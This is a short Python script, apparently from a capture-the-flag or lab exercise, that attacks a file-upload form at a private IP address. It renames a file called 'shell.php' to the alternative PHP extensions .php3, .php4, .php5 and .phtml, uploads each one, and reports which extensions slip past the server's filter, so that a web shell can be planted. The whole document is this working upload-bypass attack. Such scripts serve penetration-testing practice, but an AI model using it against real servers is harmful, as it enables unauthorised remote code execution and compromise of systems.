#!/usr/bin/env python

import requests
import os

url = f"http://10.10.210.211:3333/internal/index.php" #CHANGE THIS

default_filename = "shell.php"

filename = "shell"
extensions = [
".php3",
".php4",
".php5",
".phtml",
#CHANGE BASED ON EXT
]

for ext in extensions:
	new_filename = filename + ext
	os.rename(default_filename, new_filename)

	files = {"file": open(new_filename, "rb")}
	r = requests.post(url, files=files)

	if "Extension not allowed" in r.text:
		print(f"{ext} not allowed")
	else:
		print(f"{ext} Allowed")
	default_filename = new_filename
